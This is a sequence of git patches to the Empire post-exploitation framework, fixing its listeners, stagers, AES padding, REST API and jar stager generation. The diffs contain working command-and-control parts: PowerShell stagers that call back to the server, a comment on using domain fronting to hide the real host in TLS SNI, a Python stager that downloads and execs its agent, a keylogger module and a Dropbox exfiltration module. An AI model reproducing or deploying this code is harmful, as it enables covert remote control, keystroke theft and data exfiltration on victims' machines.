b/lib/modules/python/collection/linux/xkeylogger.py @@ -782,11 +782,6 @@ def to_keysyms(released, group, level): return u''.join(keys) run() -x = 0 -while x < 4: - sleep(6) - job_message_buffer('test '+str(x)+'\\n') - x += 1 job_message_buffer('[!] Keylogger exited\\n') """ From 6243a6b094e1f1c547036c50b55e4be629cb40e5 Mon Sep 17 00:00:00 2001 From: xorrior Date: Mon, 23 Oct 2017 21:53:42 -0400 Subject: [PATCH 31/50] Fixed orphaned agent restaging for powershell --- lib/listeners/http.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 610d0a1..ab79c31 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -708,6 +708,7 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } @@ -801,13 +802,14 @@ def send_message(packets=None): self.app = app - @app.route('/') - def send_stager(stagerURI): - if stagerURI: - launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) - return launcher - else: - pass + #@app.route('/') + #def send_stager(stagerURI): + #if stagerURI: + #launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) + #return launcher + #else: + #pass + @app.before_request def check_ip(): """ @@ -882,7 +884,7 @@ def send_message(packets=None): if 'not in cache' in results: # signal the client to restage - print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)) + print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) From dc0f43ee5d9e5e13175d72d2311d54a98fa73b1a Mon Sep 17 00:00:00 2001 From: xorrior Date: Mon, 23 Oct 2017 22:03:22 -0400 Subject: [PATCH 32/50] Updated all listeners for renegotiation --- lib/listeners/http.py | 5 ++++- lib/listeners/http_com.py | 4 ++++ lib/listeners/http_foreign.py | 4 ++++ lib/listeners/http_hop.py | 4 ++++ 4 files changed, 16 insertions(+), 1 deletion(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index ab79c31..9b9767d 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -708,7 +708,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... - Start-Negotiate -S "$ser" -SK $SK -UA $ua + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index 59833de..4117bf3 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -460,6 +460,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index 1228b55..a7ce61f 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -451,6 +451,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index cd44cda..f6d5044 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -419,6 +419,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } From 4106db3279e546722d546e65098023644195eee5 Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 02:45:41 -0400 Subject: [PATCH 33/50] Fixed renegotation loop in stager --- data/agent/stagers/http.py | 22 ++++++++++++---------- lib/listeners/http.py | 4 ++++ lib/listeners/http_foreign.py | 4 +++- lib/listeners/http_hop.py | 4 +++- 4 files changed, 22 insertions(+), 12 deletions(-) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 0a06c5a..99b6de6 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -18,6 +18,8 @@ import socket import subprocess from binascii import hexlify + + LANGUAGE = { 'NONE' : 0, 'POWERSHELL' : 1, @@ -335,10 +337,10 @@ class AES(object): tt = tk[KC - 1] tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^ - (self.S[(tt >> 8) & 0xFF] << 16) ^ - (self.S[ tt & 0xFF] << 8) ^ - self.S[(tt >> 24) & 0xFF] ^ - (self.rcon[rconpointer] << 24)) + (self.S[(tt >> 8) & 0xFF] << 16) ^ + (self.S[ tt & 0xFF] << 8) ^ + self.S[(tt >> 24) & 0xFF] ^ + (self.rcon[rconpointer] << 24)) rconpointer += 1 if KC != 8: @@ -352,9 +354,9 @@ class AES(object): tt = tk[KC // 2 - 1] tk[KC // 2] ^= (self.S[ tt & 0xFF] ^ - (self.S[(tt >> 8) & 0xFF] << 8) ^ - (self.S[(tt >> 16) & 0xFF] << 16) ^ - (self.S[(tt >> 24) & 0xFF] << 24)) + (self.S[(tt >> 8) & 0xFF] << 8) ^ + (self.S[(tt >> 16) & 0xFF] << 16) ^ + (self.S[(tt >> 24) & 0xFF] << 24)) for i in xrange(KC // 2 + 1, KC): tk[i] ^= tk[i - 1] @@ -372,9 +374,9 @@ class AES(object): for j in xrange(0, 4): tt = self._Kd[r][j] self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^ - self.U2[(tt >> 16) & 0xFF] ^ - self.U3[(tt >> 8) & 0xFF] ^ - self.U4[ tt & 0xFF]) + self.U2[(tt >> 16) & 0xFF] ^ + self.U3[(tt >> 8) & 0xFF] ^ + self.U4[ tt & 0xFF]) def encrypt(self, plaintext): 'Encrypt a block of plain text using the AES block cipher.' diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 9b9767d..01149a2 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -762,6 +762,10 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) + return (HTTPError.code, '') except urllib2.URLError as URLerror: diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index a7ce61f..2aceb53 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -502,7 +502,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + r#if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index f6d5044..16106f7 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -470,7 +470,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached From 9093b3df9e04dbdc15de5cc28e3efb0cdaedda1e Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 09:43:51 -0400 Subject: [PATCH 34/50] Fix for #774 --- lib/stagers/multi/pyinstaller.py | 31 ++++++++++++++----------------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py index f3a9ba0..b59605a 100644 --- a/lib/stagers/multi/pyinstaller.py +++ b/lib/stagers/multi/pyinstaller.py @@ -1,4 +1,5 @@ from lib.common import helpers +import os """ @@ -42,21 +43,21 @@ class Stager: 'Required' : True, 'Value' : '' }, - 'Language' : { - 'Description' : 'Language of the stager to generate.', - 'Required' : True, - 'Value' : 'python' - }, + 'Language' : { + 'Description' : 'Language of the stager to generate.', + 'Required' : True, + 'Value' : 'python' + }, 'BinaryFile' : { 'Description' : 'File to output launcher to.', 'Required' : True, 'Value' : '/tmp/empire' }, - 'SafeChecks' : { - 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', - 'Required' : True, - 'Value' : 'True' - }, + 'SafeChecks' : { + 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', + 'Required' : True, + 'Value' : 'True' + }, 'Base64' : { 'Description' : 'Switch. Base64 encode the output. Defaults to False.', 'Required' : True, @@ -116,17 +117,13 @@ class Stager: #installPath_Str = cur.fetchone()[0] cur.close() - import os -#<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py + stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py" - #stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py") -#======= - stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py") -#>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py + stagerFFP_Str = os.path.join(self.mainMenu.installPath, "data/agent/stagers/http.py") + filesToExtractImportsFrom_List.append(stagerFFP_Str) agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py" - #agentFFP_Str = os.path.join(installPath_Str, "data/agent/agent.py") filesToExtractImportsFrom_List.append(agentFFP_Str) imports_List = [] From 2e5d8055b253d7b66141b8e83338fccf5007e9d6 Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 10:04:33 -0400 Subject: [PATCH 35/50] Removed additional comments in pyinstaller module --- lib/stagers/multi/pyinstaller.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py index b59605a..6f4b78b 100644 --- a/lib/stagers/multi/pyinstaller.py +++ b/lib/stagers/multi/pyinstaller.py @@ -6,7 +6,8 @@ import os Install steps... - install pyInstaller --- try: apt-get -y install python-pip && pip install pyinstaller +-- try: + - copy into stagers directory -- ./Empire/lib/stagers/ @@ -113,8 +114,7 @@ class Stager: self.conn = self.mainMenu.conn # pull out the code install path from the database config cur = self.conn.cursor() - #cur.execute("SELECT install_path FROM config") - #installPath_Str = cur.fetchone()[0] + cur.close() From c8217e87cf333797eb363b782f769cc4b2f64b0b Mon Sep 17 00:00:00 2001 From: rvrsh3ll Date: Tue, 24 Oct 2017 10:30:03 -0400 Subject: [PATCH 36/50] Fix for stagerURI --- lib/listeners/http.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 263228e..39a2215 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -107,7 +107,7 @@ class Listener: 'Value' : 'Microsoft-IIS/7.5' }, 'StagerURI' : { - 'Description' : 'URI for the stager. Example: stager.php', + 'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php', 'Required' : False, 'Value' : '' }, @@ -801,9 +801,9 @@ def send_message(packets=None): self.app = app - @app.route('/') - def send_stager(stagerURI): - if stagerURI: + @app.route('/download/') + def send_stager(stager): + if stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher else: From 627aaf268d22257bb5b1769e461c0b09b430da2c Mon Sep 17 00:00:00 2001 From: rvrsh3ll Date: Tue, 24 Oct 2017 10:31:14 -0400 Subject: [PATCH 37/50] Fix stagerURI --- lib/listeners/http.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 610d0a1..4163bac 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -295,10 +295,10 @@ class Listener: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] - #If host header defined, assume domain fronting is in use and add a call to the base URL first - #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello - if headerKey.lower() == "host": - stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") + #If host header defined, assume domain fronting is in use and add a call to the base URL first + #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello + if headerKey.lower() == "host": + stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) From 0eb4cd02d3bd3c4f565d09fd7b8dca2bc2677a1a Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 11:10:59 -0400 Subject: [PATCH 38/50] Fix tabs in empire.py and http.py --- lib/common/empire.py | 2 +- lib/listeners/http.py | 9 +++++---- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 9b01345..db696bc 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2893,7 +2893,7 @@ class ListenersMenu(SubMenu): def do_launcher(self, line): "Generate an initial launcher for a listener." - + parts = line.strip().split() if len(parts) != 2: print helpers.color("[!] Please enter 'launcher '") diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 1fe123c..c91e15c 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -295,10 +295,11 @@ class Listener: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] - #If host header defined, assume domain fronting is in use and add a call to the base URL first - #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello - if headerKey.lower() == "host": - stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") + #If host header defined, assume domain fronting is in use and add a call to the base URL first + #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello + if headerKey.lower() == "host": + stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") + stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) From 8c7310adb147a768817c7f6d2080197e314b56f1 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 26 Oct 2017 13:04:15 -0700 Subject: [PATCH 39/50] fix broken call to generate by invoke-obfuscation changes --- lib/modules/powershell/exfiltration/exfil_dropbox.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/modules/powershell/exfiltration/exfil_dropbox.py b/lib/modules/powershell/exfiltration/exfil_dropbox.py index a6b70b0..c1e8482 100644 --- a/lib/modules/powershell/exfiltration/exfil_dropbox.py +++ b/lib/modules/powershell/exfiltration/exfil_dropbox.py @@ -84,7 +84,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-DropboxUpload { @@ -137,5 +137,5 @@ Invoke-DropboxUpload """ script += " -" + str(option) else: script += " -" + str(option) + " " + str(values['Value']) - + return script From cfdc5d5556b72c76925a7db83b90417cabd9e1d5 Mon Sep 17 00:00:00 2001 From: xorrior Date: Fri, 27 Oct 2017 03:47:06 -0400 Subject: [PATCH 40/50] Patch b64decode padding error --- data/agent/agent.py | 3 +++ lib/common/agents.py | 8 ++++---- lib/common/packets.py | 9 +-------- 3 files changed, 8 insertions(+), 12 deletions(-) diff --git a/data/agent/agent.py b/data/agent/agent.py index c35cf4f..e84692f 100644 --- a/data/agent/agent.py +++ b/data/agent/agent.py @@ -134,6 +134,9 @@ def build_response_packet(taskingID, packetData, resultID=0): if packetData: packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8',errors='ignore')) + if len(packetData) % 4: + packetData += '=' * (4 - len(packetData) % 4) + length = struct.pack('=L',len(packetData)) return packetType + totalPacket + packetNum + resultID + length + packetData else: diff --git a/lib/common/agents.py b/lib/common/agents.py index f318015..d4f7557 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1481,10 +1481,10 @@ class Agents: conn = self.get_db_connection() cur = conn.cursor() data = cur.execute("SELECT data FROM taskings WHERE agent=? AND id=?", [sessionID,taskID]).fetchone()[0] - cur.close() - theSender="Agents" - if data.startswith("function Get-Keystrokes"): - theSender += "PsKeyLogger" + cur.close() + theSender="Agents" + if data.startswith("function Get-Keystrokes"): + theSender += "PsKeyLogger" if results: # signal that this agent returned results dispatcher.send("[*] Agent %s returned results." % (sessionID), sender=theSender) diff --git a/lib/common/packets.py b/lib/common/packets.py index b73ad36..89373e7 100644 --- a/lib/common/packets.py +++ b/lib/common/packets.py @@ -199,14 +199,7 @@ def parse_result_packet(packet, offset=0): taskID = struct.unpack('=H', packet[6+offset:8+offset])[0] length = struct.unpack('=L', packet[8+offset:12+offset])[0] if length != '0': - if length % 4: - #padding fix - datapart = packet[12+offset:12+offset+length] - datapart += '=' * (4 - length % 4) - data = base64.b64decode(datapart) - else: - data = base64.b64decode(packet[12+offset:12+offset+length]) - #data = base64.b64decode(packet[12+offset:12+offset+length]) + data = base64.b64decode(packet[12+offset:12+offset+length]) else: data = None remainingData = packet[12+offset+length:] From d41c7da1908ce00ecf7d283e7f228d74ca58b235 Mon Sep 17 00:00:00 2001 From: ThePirateWhoSmellsOfSunflowers Date: Fri, 27 Oct 2017 17:10:15 +0200 Subject: [PATCH 41/50] Fix the padding and a logic bug in aes implementation, should fix #586 --- data/agent/stagers/dropbox.py | 37 ++++++++++++++++------------------- data/agent/stagers/http.py | 36 +++++++++++++++------------------- 2 files changed, 33 insertions(+), 40 deletions(-) diff --git a/data/agent/stagers/dropbox.py b/data/agent/stagers/dropbox.py index cfb8831..b840eeb 100644 --- a/data/agent/stagers/dropbox.py +++ b/data/agent/stagers/dropbox.py @@ -247,11 +247,8 @@ except Exception: return c def append_PKCS7_padding(data): - if (len(data) % 16) == 0: - return data - else: - pad = 16 - (len(data) % 16) - return data + to_bufferable(chr(pad) * pad) + pad = 16 - (len(data) % 16) + return data + to_bufferable(chr(pad) * pad) def strip_PKCS7_padding(data): @@ -259,11 +256,7 @@ def strip_PKCS7_padding(data): raise ValueError("invalid length") pad = _get_byte(data[-1]) - - if pad <= 16: - return data[:-pad] - else: - return data + return data[:-pad] class AES(object): '''Encapsulates the AES block cipher. @@ -522,10 +515,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation): def CBCenc(aesObj, plaintext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary - blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)] - blocks[-1] = append_PKCS7_padding(blocks[-1]) + # First we padd the plaintext + paddedPlaintext = append_PKCS7_padding(plaintext) + + # The we break the padded plaintext in 16 byte chunks + blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] + # Finally we encypt each block ciphertext = "" for block in blocks: ciphertext += aesObj.encrypt(block) @@ -535,15 +531,16 @@ def CBCenc(aesObj, plaintext, base64=False): def CBCdec(aesObj, ciphertext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary + # First we break the cyphertext in 16 byte chunks blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)] - plaintext = "" + # Then we decrypt each block + paddedPlaintext = "" + for block in blocks: + paddedPlaintext += aesObj.decrypt(block) - for x in xrange(0, len(blocks)-1): - plaintext += aesObj.decrypt(blocks[x]) - - plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1])) + # Finally we strip the padding + plaintext = strip_PKCS7_padding(paddedPlaintext) return plaintext @@ -892,4 +889,4 @@ response = post_message("https://api.dropboxapi.com/2/files/delete",data=datastr # step 6 -> server sends HMAC(AES) agent = aes_decrypt_and_verify(key, raw) -exec(agent) \ No newline at end of file +exec(agent) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 99b6de6..7871fdf 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -251,13 +251,9 @@ except Exception: def _get_byte(c): return c - def append_PKCS7_padding(data): - if (len(data) % 16) == 0: - return data - else: - pad = 16 - (len(data) % 16) - return data + to_bufferable(chr(pad) * pad) + pad = 16 - (len(data) % 16) + return data + to_bufferable(chr(pad) * pad) def strip_PKCS7_padding(data): @@ -265,11 +261,7 @@ def strip_PKCS7_padding(data): raise ValueError("invalid length") pad = _get_byte(data[-1]) - - if pad <= 16: - return data[:-pad] - else: - return data + return data[:-pad] class AES(object): @@ -530,10 +522,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation): def CBCenc(aesObj, plaintext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary - blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)] - blocks[-1] = append_PKCS7_padding(blocks[-1]) + # First we padd the plaintext + paddedPlaintext = append_PKCS7_padding(plaintext) + + # The we break the padded plaintext in 16 byte chunks + blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] + # Finally we encypt each block ciphertext = "" for block in blocks: ciphertext += aesObj.encrypt(block) @@ -543,15 +538,16 @@ def CBCenc(aesObj, plaintext, base64=False): def CBCdec(aesObj, ciphertext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary + # First we break the cyphertext in 16 byte chunks blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)] - plaintext = "" + # Then we decrypt each block + paddedPlaintext = "" + for block in blocks: + paddedPlaintext += aesObj.decrypt(block) - for x in xrange(0, len(blocks)-1): - plaintext += aesObj.decrypt(blocks[x]) - - plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1])) + # Finally we strip the padding + plaintext = strip_PKCS7_padding(paddedPlaintext) return plaintext From 6d67f23119d81d09960456e82600e7645a1ee38c Mon Sep 17 00:00:00 2001 From: xorrior Date: Sat, 28 Oct 2017 11:11:34 -0400 Subject: [PATCH 42/50] Fix for #777 --- .../situational_awareness/network/get_sql_server_info.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index ca86149..056ca1c 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -79,6 +79,7 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" + scriptEnd = "" if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: @@ -96,6 +97,7 @@ class Module: if password != "": scriptEnd += " -Password "+password scriptEnd += " | " + scriptEnd += " Get-SQLServerInfo" if username != "": scriptEnd += " -Username "+username From 5f02ee8c45a846e7f59c34ec689ad10e2bf3234e Mon Sep 17 00:00:00 2001 From: xorrior Date: Sat, 28 Oct 2017 12:09:58 -0400 Subject: [PATCH 43/50] Minor bug fixes with rest/headless --- empire | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/empire b/empire index 79e6759..aa5e7d0 100755 --- a/empire +++ b/empire @@ -1161,7 +1161,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, if not os.path.exists('./data/empire-chain.pem'): - print "[!] Error: cannot find certificate ./data/empire.pem" + print "[!] Error: cannot find certificate ./data/empire-chain.pem" sys.exit() @@ -1229,6 +1229,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, certPath = os.path.abspath("./data/") # support any version of tls + pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: @@ -1277,11 +1278,11 @@ if __name__ == '__main__': # start an Empire instance and RESTful API main = empire.MainMenu(args=args) def thread_api(empireMenu): - while serverExitCommand == 'restart': - try: - start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport) - except SystemExit as e: - pass + + try: + start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport) + except SystemExit as e: + pass thread = helpers.KThread(target=thread_api, args=(main,)) thread.daemon = True @@ -1292,11 +1293,11 @@ if __name__ == '__main__': elif args.headless: # start an Empire instance and RESTful API and suppress output main = empire.MainMenu(args=args) - while serverExitCommand == 'restart': - try: - start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport) - except SystemExit as e: - pass + + try: + start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport) + except SystemExit as e: + pass else: # normal execution From 8306cbbae320afee81ac812a4291667dd088579f Mon Sep 17 00:00:00 2001 From: Dakota Nelson Date: Sun, 29 Oct 2017 11:04:14 +0000 Subject: [PATCH 44/50] Include better error messages for credentials POST endpoint --- empire | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/empire b/empire index 5cbfc42..e21ac6b 100755 --- a/empire +++ b/empire @@ -1044,11 +1044,17 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, """ Adds credentials to the database """ - if not request.json or not 'credentials' in request.json: - abort(400) + if not request.json: + return make_response(jsonify({'error':'request body must be valid JSON'}), 400) + + if not 'credentials' in request.json: + return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400) creds = request.json['credentials'] + if not type(creds) == list: + return make_response(jsonify({'error':'credentials must be provided as a list'}), 400) + required_fields = ["credtype", "domain", "username", "password", "host"] optional_fields = ["OS", "notes", "sid"] From 863c1fe42e77faaed15929bafbde73f2c0ff5074 Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 31 Oct 2017 22:08:22 -0400 Subject: [PATCH 45/50] add missing import --- lib/common/listeners.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/listeners.py b/lib/common/listeners.py index 31507dd..2a216b5 100644 --- a/lib/common/listeners.py +++ b/lib/common/listeners.py @@ -4,7 +4,7 @@ Listener handling functionality for Empire. """ - +import sys import fnmatch import imp import helpers From d94229c330bf23a4500fb9e97a4b305618379ddc Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 31 Oct 2017 22:09:08 -0400 Subject: [PATCH 46/50] Add missing import --- lib/listeners/http.py | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 27e846c..9155696 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -1,5 +1,6 @@ import logging import base64 +import sys import random import os import ssl From 2475ef3b9d096b0cda1d73264ebd222d66725c73 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Wed, 1 Nov 2017 09:13:07 -0600 Subject: [PATCH 47/50] fix bug that was blocking module output (such as mimikatz) from showing on screen --- lib/common/agents.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 965c9be..5a55c37 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1534,7 +1534,10 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: - keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] + try: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] + except Exception as e: + pass cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: From 64e4b370df70f60ed0c599ae96b70f801f78dc63 Mon Sep 17 00:00:00 2001 From: xorrior Date: Wed, 1 Nov 2017 13:22:14 -0400 Subject: [PATCH 48/50] Fixed tabs in recent merge --- lib/common/agents.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 211c633..8b39b4e 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1534,10 +1534,10 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: - try: - keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] - except Exception as e: - pass + try: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] + except Exception as e: + pass cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: From e5729e67d5b0a7aabcbb437c129f18c60c469649 Mon Sep 17 00:00:00 2001 From: xorrior Date: Wed, 1 Nov 2017 20:48:34 -0400 Subject: [PATCH 49/50] Repair jar stager generation --- lib/common/stagers.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/lib/common/stagers.py b/lib/common/stagers.py index 18aad49..5f4b236 100644 --- a/lib/common/stagers.py +++ b/lib/common/stagers.py @@ -18,6 +18,7 @@ import fnmatch import imp import helpers import os +import errno import macholib.MachO import shutil import zipfile @@ -443,6 +444,15 @@ class Stagers: javacode = file.read() file.close() javacode = javacode.replace("LAUNCHER",launcherCode) + jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/' + try: + os.makedirs(jarpath) + except OSError as e: + if e.errno != errno.EEXIST: + raise + else: + pass + file = open(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java','w') file.write(javacode) file.close() From 97b1e241146ba9870e1d3a622dce182e67915961 Mon Sep 17 